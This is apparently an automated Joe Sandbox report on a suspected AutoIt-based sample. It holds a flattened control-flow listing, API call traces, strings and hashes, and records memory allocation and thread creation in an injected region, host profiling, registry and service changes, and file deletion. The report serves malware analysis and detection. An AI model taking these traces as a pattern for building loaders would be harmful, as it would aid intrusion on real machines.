109945 420db6 Mailbox 59 API calls 109944->109945 109946 405240 109945->109946 109946->109827 109948 404ea3 FindResourceExW 109947->109948 109952 404ec0 109947->109952 109949 43d933 LoadResource 109948->109949 109948->109952 109950 43d948 SizeofResource 109949->109950 109949->109952 109951 43d95c LockResource 109950->109951 109950->109952 109951->109952 109952->109833 109954 404ef4 109953->109954 109955 43d9ab 109953->109955 109959 42584d 109954->109959 109957 404f02 109957->109839 109958->109833 109960 425859 __wfsopen 109959->109960 109961 42586b 109960->109961 109963 425891 109960->109963 109972 428b28 58 API calls __getptd_noexit 109961->109972 109965 426c11 __lock_file 59 API calls 109963->109965 109964 425870 109973 428db6 9 API calls __wfsopen 109964->109973 109967 425897 109965->109967 109974 4257be 83 API calls 5 library calls 109967->109974 109969 4258a6 109975 4258c8 LeaveCriticalSection LeaveCriticalSection _fseek 109969->109975 109971 42587b __wfsopen 109971->109957 109972->109964 109973->109971 109974->109969 109975->109971 109979 4255fd 109976->109979 109978 404f2e 109978->109847 109981 425609 __wfsopen 109979->109981 109980 425644 __wfsopen 109980->109978 109981->109980 109982 42561f _memset 109981->109982 109983 42564c 109981->109983 109992 428b28 58 API calls __getptd_noexit 109982->109992 109984 426c11 __lock_file 59 API calls 109983->109984 109986 425652 109984->109986 109994 42541d 72 API calls 6 library calls 109986->109994 109987 425639 109993 428db6 9 API calls __wfsopen 109987->109993 109990 425668 109995 425686 LeaveCriticalSection LeaveCriticalSection _fseek 109990->109995 109992->109987 109993->109980 109994->109990 109995->109980 109999 42520a GetSystemTimeAsFileTime 109996->109999 109998 468f6e 109998->109849 110000 425238 __aulldiv 109999->110000 110000->109998 110002 425c6c __wfsopen 110001->110002 110003 425c93 110002->110003 110004 425c7e 110002->110004 110005 426c11 __lock_file 59 API calls 110003->110005 110015 428b28 58 API 
calls __getptd_noexit 110004->110015 110007 425c99 110005->110007 110017 4258d0 67 API calls 6 library calls 110007->110017 110008 425c83 110016 428db6 9 API calls __wfsopen 110008->110016 110011 425ca4 110018 425cc4 LeaveCriticalSection LeaveCriticalSection _fseek 110011->110018 110013 425cb6 110014 425c8e __wfsopen 110013->110014 110014->109854 110015->110008 110016->110014 110017->110011 110018->110013 110020 4078b7 110019->110020 110021 40785a 110019->110021 110022 407d2c 59 API calls 110020->110022 110021->110020 110023 407865 110021->110023 110028 407888 _memmove 110022->110028 110024 407880 110023->110024 110025 43eb09 110023->110025 110041 407f27 110024->110041 110027 408029 59 API calls 110025->110027 110029 43eb13 110027->110029 110028->109635 110030 420db6 Mailbox 59 API calls 110029->110030 110031 43eb33 110030->110031 110033 407d3a 110032->110033 110035 407d43 _memmove 110032->110035 110034 407e4f 59 API calls 110033->110034 110033->110035 110034->110035 110035->109629 110037 407da6 110036->110037 110039 407d99 110036->110039 110038 420db6 Mailbox 59 API calls 110037->110038 110038->110039 110039->109630 110040->109658 110042 407f39 110041->110042 110043 407f3f 110041->110043 110042->110028 110044 420db6 Mailbox 59 API calls 110043->110044 110044->110042 110046 407a85 _memmove 110045->110046 110047 407a5f 110045->110047 110046->109671 110047->110046 110048 420db6 Mailbox 59 API calls 110047->110048 110049 407ad4 110048->110049 110050 420db6 Mailbox 59 API calls 110049->110050 110050->110046 110051->109672 110147->109786 110149 407c5f __NMSG_WRITE 110148->110149 110150 407c70 _memmove 110149->110150 110151 408029 59 API calls 110149->110151 110150->109793 110152 43ed07 _memmove 110151->110152 110153->109258 110154->109230 110155->109244 110156->109242 110157->109246 110158->109256 110159->109259 110160->109263 110161->108998 110162->108996 110163->108890 110164->108890 110165->108881 110166->108874 110167->108875 110168->108874 110169->108911 110170 
401066 110175 40f76f 110170->110175 110172 40106c 110173 422d40 __cinit 67 API calls 110172->110173 110174 401076 110173->110174 110176 40f790 110175->110176 110208 41ff03 110176->110208 110180 40f7d7 110181 407667 59 API calls 110180->110181 110182 40f7e1 110181->110182 110183 407667 59 API calls 110182->110183 110184 40f7eb 110183->110184 110185 407667 59 API calls 110184->110185 110186 40f7f5 110185->110186 110187 407667 59 API calls 110186->110187 110188 40f833 110187->110188 110189 407667 59 API calls 110188->110189 110190 40f8fe 110189->110190 110218 415f87 110190->110218 110194 40f930 110195 407667 59 API calls 110194->110195 110196 40f93a 110195->110196 110246 41fd9e 110196->110246 110198 40f981 110199 40f991 GetStdHandle 110198->110199 110200 40f9dd 110199->110200 110201 4445ab 110199->110201 110202 40f9e5 OleInitialize 110200->110202 110201->110200 110203 4445b4 110201->110203 110202->110172 110253 466b38 64 API calls Mailbox 110203->110253 110205 4445bb 110254 467207 CreateThread 110205->110254 110207 4445c7 CloseHandle 110207->110202 110255 41ffdc 110208->110255 110211 41ffdc 59 API calls 110212 41ff45 110211->110212 110213 407667 59 API calls 110212->110213 110214 41ff51 110213->110214 110215 407bcc 59 API calls 110214->110215 110216 40f796 110215->110216 110217 420162 6 API calls 110216->110217 110217->110180 110219 407667 59 API calls 110218->110219 110220 415f97 110219->110220 110221 407667 59 API calls 110220->110221 110222 415f9f 110221->110222 110262 415a9d 110222->110262 110225 415a9d 59 API calls 110226 415faf 110225->110226 110227 407667 59 API calls 110226->110227 110228 415fba 110227->110228 110229 420db6 Mailbox 59 API calls 110228->110229 110230 40f908 110229->110230 110231 4160f9 110230->110231 110232 416107 110231->110232 110233 407667 59 API calls 110232->110233 110234 416112 110233->110234 110235 407667 59 API calls 110234->110235 110236 41611d 110235->110236 110237 407667 59 API calls 110236->110237 110238 416128 110237->110238 110239 
407667 59 API calls 110238->110239 110240 416133 110239->110240 110241 415a9d 59 API calls 110240->110241 110242 41613e 110241->110242 110243 420db6 Mailbox 59 API calls 110242->110243 110244 416145 RegisterWindowMessageW 110243->110244 110244->110194 110247 45576f 110246->110247 110248 41fdae 110246->110248 110265 469ae7 60 API calls 110247->110265 110250 420db6 Mailbox 59 API calls 110248->110250 110252 41fdb6 110250->110252 110251 45577a 110252->110198 110253->110205 110254->110207 110266 4671ed 65 API calls 110254->110266 110256 407667 59 API calls 110255->110256 110257 41ffe7 110256->110257 110258 407667 59 API calls 110257->110258 110259 41ffef 110258->110259 110260 407667 59 API calls 110259->110260 110261 41ff3b 110260->110261 110261->110211 110263 407667 59 API calls 110262->110263 110264 415aa5 110263->110264 110264->110225 110265->110251 110267 2f15a3b 110268 2f15a45 110267->110268 110273 2f14f7c 110267->110273 110269 2f15a4b CreateThread 110268->110269 110270 2f151ae 110268->110270 110272 2f15a59 RtlExitUserThread 110269->110272 110271 2f14f88 110277 2f15b1d 110272->110277 110273->110271 110280 2f15d20 110273->110280 110276 2f14f99 110278 2f15d20 2 API calls 110277->110278 110279 2f15b3c 110278->110279 110282 2f15d22 110280->110282 110281 2f15d39 VirtualAlloc 110281->110282 110282->110276 110282->110281 110284 2f15d46 VirtualFree 110282->110284 110284->110276 110285 44416f 110289 455fe6 110285->110289 110287 44417a 110288 455fe6 85 API calls 110287->110288 110288->110287 110290 456020 110289->110290 110294 455ff3 110289->110294 110290->110287 110291 456022 110301 409328 84 API calls Mailbox 110291->110301 110292 456027 110295 409837 84 API calls 110292->110295 110294->110290 110294->110291 110294->110292 110298 45601a 110294->110298 110296 45602e 110295->110296 110297 407b2e 59 API calls 110296->110297 110297->110290 110300 4095a0 59 API calls _wcsstr 110298->110300 110300->110290 110301->110292 110302 40e5ab 110305 40d100 110302->110305 110304 40e5b9 
[Control-flow graph residue: a flattened edge list of disassembler node IDs and addresses (0x40xxxx, 0xa8xxxx, 0x2f1xxxx ranges) with API-call annotations. Recoverable API names on the nodes include SetFilePointerEx, WriteFile, PostQuitMessage, SetTimer, RegisterWindowMessageW, Shell_NotifyIconW, GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, IsDebuggerPresent, SetUnhandledExceptionFilter, TerminateProcess, GetCurrentDirectoryW, RegOpenKeyExW, RegQueryValueExW, GetVersionExW, IsWow64Process, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, GetUserNameW, GetVolumeInformationW, GetComputerNameW, OpenMutexW, SetEntriesInAclW, AllocateAndInitializeSid, OpenServiceW, StartServiceW, ChangeServiceConfigW, CreateFileW, VirtualAlloc, VirtualFree, VirtualProtect, CharUpperBuffW and CharLowerBuffW; the edge pairs themselves are omitted.]
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: d$w
                                                                              • API String ID: 0-2400632791
                                                                              • Opcode ID: 80621b43b41d545b75f308f1e74ad361fd00b392462f1c240ee658746d899b4b
                                                                              • Instruction ID: 2193cbdb64778443b2a9948bfca38cf51f3f8f25781921162b3e55f57100c88d
                                                                              • Opcode Fuzzy Hash: 80621b43b41d545b75f308f1e74ad361fd00b392462f1c240ee658746d899b4b
                                                                              • Instruction Fuzzy Hash: 83C15A32E0C380AEEA336628CC29B397B646B51BECF4C0147EB56F61F2D7658444D622

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                              • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                              • API String ID: 529118366-2806069697
                                                                              • Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                              • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                              • Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
                                                                              • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                              • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                              • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                              • String ID:
                                                                              • API String ID: 1986165174-0
                                                                              • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                              • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                              • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                              • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                              • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
                                                                              • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                              • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                              • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                              • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: pbL$%I
                                                                              • API String ID: 3964851224-1578263234
                                                                              • Opcode ID: dfbcc37cd1eaecf0c5fa999f792a3d1c1c10435ba2f132f832dcd1883ffe7f21
                                                                              • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                              • Opcode Fuzzy Hash: dfbcc37cd1eaecf0c5fa999f792a3d1c1c10435ba2f132f832dcd1883ffe7f21
                                                                              • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                              • API String ID: 0-2838938394
                                                                              • Opcode ID: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                              • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                              • Opcode Fuzzy Hash: 2c35b3d26c95a021f08b930a365da4d97caa2da8ff1c5750d170567e5b24b5e9
                                                                              • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                              • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                              • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                              • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                              • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                              • timeGetTime.WINMM ref: 00410D16
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                              • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                              • DestroyWindow.USER32 ref: 00410F06
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                              • TranslateMessage.USER32(?), ref: 00445C60
                                                                              • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                              • API String ID: 4212290369-1082885916
                                                                              • Opcode ID: c7d318ed77a4caedac4747d0211625527e950e7c208a1bc8e1125b7c96807fab
                                                                              • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                              • Opcode Fuzzy Hash: c7d318ed77a4caedac4747d0211625527e950e7c208a1bc8e1125b7c96807fab
                                                                              • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2587402804-0
                                                                              • Opcode ID: 4f59804e8ad8ac9332cc74faadd3434d9349e4b3df81aa176b71054da66d7e84
                                                                              • Instruction ID: 3416b4708e58fea9e2460614653884210a120864905e32196077b3617a453114
                                                                              • Opcode Fuzzy Hash: 4f59804e8ad8ac9332cc74faadd3434d9349e4b3df81aa176b71054da66d7e84
                                                                              • Instruction Fuzzy Hash: 56F11AA2D4D3809EEB3766388C09775BBA16F526F8F4C0745F752CB1E2D76C8844C266

                                                                               Control-flow Graph (function entry 00469155)
                                                                              APIs
                                                                                • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                              • __wsplitpath.LIBCMT ref: 00469234
                                                                                • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                              • _wcscpy.LIBCMT ref: 00469247
                                                                              • _wcscat.LIBCMT ref: 0046925A
                                                                              • __wsplitpath.LIBCMT ref: 0046927F
                                                                              • _wcscat.LIBCMT ref: 00469295
                                                                              • _wcscat.LIBCMT ref: 004692A8
                                                                                • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                              • _wcscmp.LIBCMT ref: 004691EF
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                              • _wcsncpy.LIBCMT ref: 004694C5
                                                                              • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
